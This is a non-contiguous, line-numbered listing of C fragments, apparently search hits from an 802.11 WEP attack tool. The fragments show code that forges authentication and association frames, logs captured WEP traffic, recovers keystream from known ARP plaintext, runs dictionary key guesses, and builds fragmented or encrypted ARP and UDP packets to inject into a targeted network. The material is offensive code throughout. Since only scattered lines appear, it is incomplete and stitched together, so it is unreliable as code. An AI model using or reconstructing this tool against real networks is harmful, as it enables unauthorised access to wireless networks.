
82 	struct ieee80211_frame wh;
585 void fill_basic(struct ieee80211_frame* wh) {
588 memcpy(wh->i_addr1, victim.bss, 6);
589 memcpy(wh->i_addr2, mymac, 6);
590 memcpy(wh->i_addr3, victim.bss, 6);
594 sp = (unsigned short*) wh->i_seq;
597 sp = (unsigned short*) wh->i_dur;
603 struct ieee80211_frame* wh = (struct ieee80211_frame*) buf;
608 fill_basic(wh);
609 wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ASSOC_REQ;
611 body = (unsigned char*) wh + sizeof(*wh);
631 send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2 +
659 struct ieee80211_frame* wh = (struct ieee80211_frame*) buf;
663 fill_basic(wh);
664 wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH;
666 n = (unsigned short*) ((unsigned char*) wh + sizeof(*wh));
670 send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2);
673 int get_victim_ssid(struct ieee80211_frame* wh, int len) {
678 if (len <= sizeof(*wh)) {
683 ptr = (unsigned char*)wh + sizeof(*wh);
684 len -= sizeof(*wh);
693 if (memcmp(wh->i_addr3, victim_mac, 6) != 0)
754 memcpy(victim.bss, wh->i_addr3, 6);
995 void stuff_for_us(struct ieee80211_frame* wh, int len) {
999 type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
1000 stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
1002 body = (unsigned char*) wh + sizeof(*wh);
1094 dlen = len - sizeof(*wh) - 4 -4;
1096 if (!( wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) {
1098 mac2str(wh->i_addr2), dlen, stype);
1102 assert (wh->i_fc[1] & IEEE80211_FC1_PROTECTED);
1113 memcpy (rtrmac, wh->i_addr3, 6);
1143 log_dictionary(body, len - sizeof(*wh));
1150 type, stype, mac2str(wh->i_addr2), len);
1154 void decrypt_arpreq(struct ieee80211_frame* wh, int rd) {
1162 body = (unsigned char*) wh+sizeof(*wh);
1177 memcpy(ptr, wh->i_addr3, 6);
1179 bodylen = rd - sizeof(*wh) - 4 - 4;
1203 time_print("Got ARP request from (%s)\n", mac2str(wh->i_addr3));
1206 void log_wep(struct ieee80211_frame* wh, int len) {
1210 unsigned char *body = (unsigned char*) (wh+1);
1220 rd = write(weplog.fd, wh, len);
1242 void try_dictionary(struct ieee80211_frame* wh, int len) {
1257 body = (unsigned char*) wh + sizeof(*wh);
1276 dlen = len - sizeof(*wh) - 4;
1302 if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
1303 smac = wh->i_addr3;
1305 smac = wh->i_addr2;
1307 if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS)
1308 dmac = wh->i_addr3;
1310 dmac = wh->i_addr1;
1336 int is_arp(struct ieee80211_frame *wh, int len)
1346 void *get_sa(struct ieee80211_frame *wh)
1348 if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
1349 return wh->i_addr3;
1351 return wh->i_addr2;
1354 void *get_da(struct ieee80211_frame *wh)
1356 if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
1357 return wh->i_addr1;
1359 return wh->i_addr3;
1362 int known_clear(void *clear, struct ieee80211_frame *wh, int len)
1367 if (!is_arp(wh, len)) {
1400 if (memcmp(get_da(wh), "\xff\xff\xff\xff\xff\xff", 6) == 0)
1408 memcpy(ptr, get_sa(wh), len);
1415 void add_keystream(struct ieee80211_frame* wh, int rd)
1420 unsigned char *body = (unsigned char*) (wh+1);
1423 clearsize = known_clear(clear, wh, dlen);
1433 void got_wep(struct ieee80211_frame* wh, int rd) {
1443 body = (unsigned char*) wh + sizeof(*wh);
1447 if ( (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) ||
1448 ( (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) &&
1449 memcmp(wh->i_addr2, mymac, 6) != 0) ) {
1455 log_wep(wh, rd);
1456 add_keystream(wh, rd);
1459 try_dictionary(wh, rd);
1463 if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1464 (memcmp(wh->i_addr3, mymac, 6) != 0) &&
1465 (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) &&
1469 decrypt_arpreq(wh, rd);
1475 if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1476 (memcmp(wh->i_addr3, mymac, 6) == 0) &&
1477 (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) &&
1488 if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1489 (memcmp(wh->i_addr3, mymac, 6) == 0) &&
1490 (memcmp(wh->i_addr1, MCAST_PREF, 5) == 0) &&
1493 unsigned char pr = wh->i_addr1[5];
1546 clearsize = known_clear(clear, wh, dlen);
1552 void stuff_for_net(struct ieee80211_frame* wh, int rd) {
1555 type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
1556 stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
1564 if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) {
1565 memcpy(mac, wh->i_addr3, 6);
1566 } else if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) {
1567 memcpy(mac, wh->i_addr1, 6);
1580 if ( (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) &&
1582 got_wep(wh, rd);
1588 struct ieee80211_frame* wh = (struct ieee80211_frame *) buf;
1600 type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
1601 stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
1606 if (memcmp(wh->i_addr1, mymac, 6) == 0) {
1614 seqptr = (unsigned short*) wh->i_seq;
1616 if (seq == lastseq && (wh->i_fc[1] & IEEE80211_FC1_RETRY) &&
1629 if (get_victim_ssid(wh, rd)) {
1640 stuff_for_us(wh, rd);
1644 if ( ((wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) &&
1645 (memcmp(victim.bss, wh->i_addr1, 6) == 0)) ||
1647 ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1648 (memcmp(victim.bss, wh->i_addr2, 6) == 0))
1650 stuff_for_net(wh, rd);
1691 struct ieee80211_frame* wh;
1700 wh = (struct ieee80211_frame*) buf;
1701 memcpy(wh, &fs->wh, sizeof(*wh));
1703 body = (unsigned char*) wh + sizeof(*wh);
1714 wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG;
1718 wh->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG;
1731 seq = (unsigned short*) &wh->i_seq;
1736 send_frame(tx, buf, sizeof(*wh) + 4 + fragsize+4);
1738 seq = (unsigned short*) &fs->wh.i_seq;
1765 memset(&fs->wh, 0, sizeof(fs->wh));
1766 fill_basic(&fs->wh);
1768 memset(fs->wh.i_addr3, 0xff, 6);
1769 fs->wh.i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1770 fs->wh.i_fc[1] |= IEEE80211_FC1_DIR_TODS |
1804 memcpy(decryptstate.fragstate.wh.i_addr3,
1807 decryptstate.fragstate.wh.i_addr3[5] =
1824 decryptstate.fragstate.wh.i_addr3[5] =
1830 seq = (unsigned short*) &decryptstate.fragstate.wh.i_seq;
1850 struct ieee80211_frame* wh;
1858 wh = (struct ieee80211_frame*) arp_pkt;
1859 fill_basic(wh);
1861 wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1862 wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
1863 memset(wh->i_addr3, 0xff, 6);
1865 body = (unsigned char*) wh + sizeof(*wh);
1875 arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4;
1880 wh = (struct ieee80211_frame*) udp_pkt;
1881 fill_basic(wh);
1883 wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1884 wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
1885 memcpy(wh->i_addr3, rtrmac, 6);
1887 body = (unsigned char*) wh + sizeof(*wh);
1924 udp_len = sizeof(*wh) + 4 + 8 + 20 + 8 + 5 + 4;
1969 struct ieee80211_frame* wh;
1975 wh = (struct ieee80211_frame*) arp_pkt;
1976 fill_basic(wh);
1978 wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1979 wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
1980 memset(wh->i_addr3, 0xff, 6);
1982 body = (unsigned char*) wh + sizeof(*wh);
1991 arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4;
2220 struct ieee80211_frame* wh;
2249 assert (rd < (sizeof(buf)-sizeof(*wh) - 8 - 8));
2253 wh = (struct ieee80211_frame*) taptx;
2254 memset(wh, 0, sizeof(*wh));
2255 fill_basic(wh);
2257 wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
2258 wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
2260 memcpy(wh->i_addr2, eh->ether_shost, 6);
2261 memcpy(wh->i_addr3, eh->ether_dhost, 6);
2263 body = (unsigned char*) wh + sizeof(*wh);
2273 taptx_len = sizeof(*wh) + 4 + 8 + dlen + 4;